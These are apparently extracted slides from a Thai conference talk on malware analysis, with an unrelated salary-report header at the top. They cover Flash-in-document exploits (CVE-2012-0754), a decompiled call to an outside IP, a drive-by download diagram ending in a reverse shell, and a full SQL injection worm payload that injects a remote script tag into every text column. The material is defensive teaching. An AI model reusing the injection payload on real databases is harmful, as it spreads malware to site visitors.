TeamStation AI System Report LATAM IT Salaries 2024
Advanced Malware Analysis
1. www.cdicconference.com
“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”
ชำแหละโปรแกรมไม่พงประสงค์ ด้วยเทคนิคเหนือเมฆ
ึ
อ. ประธาน พงศ์ทิพย์ฤกษ์
SANS GIAC GPEN, eCPPT, ECSA, CEH, CPTS, CIW Security Analyst, CWNA, CWSP, Security+, ITIL-F
Section Manager, Senior Information Security Consultant
ACIS Professional Center
1
2. Let’s Party Rock
Next Generation for Malware
Malware Analysis
Web Based Malware
Back to the Past
Back to the Future
Lab Challenge
2 2
9. Latest Malware fashion
MS Office+Flash Player
PDF Reader
Mobile Application
Social Network Application
Web Browser Toolbar
Web based Malware
9 9
12. CVE-2012-0754: SWF in DOC
“Iran’s Oil and Nuclear Situation.doc”
Contains flash instructing it to download and
Parse a malformed MP4.
OS Affect
Adobe Flash Player before 10.3.183.15 and 11.x
Before 11.1.102.62 on Windows, Mac OS X, Linux
And Solaris
Mobile Affect
Adobe Flash Player before 11.1.111.6 on
Android 2.x and 3.x and before 11.1.115.6 on
Android 4.x
12 12
13. Document Analysis
Decompiled Flash from file
This.MyNS.play(“http://208.115.230.76/test.mp4”);
Whois – 208.115.230.76
208.115.230.76
76-230-115-208.static.reverse.lstn.net
Host reachable, 77 ms. average, 2 of 4 pings lost
208.115.192.0 - 208.115.255.255
Limestone Networks, Inc.
400 S. Akard Street
Suite 200
Dallas
TX
75202
United States
13 13
26. About My Memory
2008
Oishi website was hacked without defacement
Kaspersky AV alert for “A little javascript file”
2009
SQL injection worms on MSSQL
Affect many Bank on Thailand
2010
Google and Firefox alert for malware website
Obfuscation JS to bypass AV
2011
Many website was blocked by Google Malware
26 26
28. SQL Injection Worms
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(D E C L A R E
@T varchar(255),@C varchar(255) DECLARE T
able_Cursor CURSOR FOR select a.name,b.nam
e from sysobjects a,syscolumns b where a.id
=b.id and a.xtype='u' and (b.xtype=99 or b.x
type=35 or b.xtype=231 or b.xtype=167) OPE
N Table_Cursor FETCH NEXT FROM Table_Cur
sor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=r
trim(convert(varchar,['+@C+']))+''<script sr
c=http://www.fengnima.cn/k.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor DEALLOCATE Table_C
u r s o r undefined AS%20NVARCHAR(4000));EXEC(@S);--
28 28
35. Drive-By Download
Visit Malicious Website
Malicious JS execute
Web Server
Redirect to Malware Server
Exploit Browser / Flash Player
Reverse Shell to Attacker
Malware Server
35 34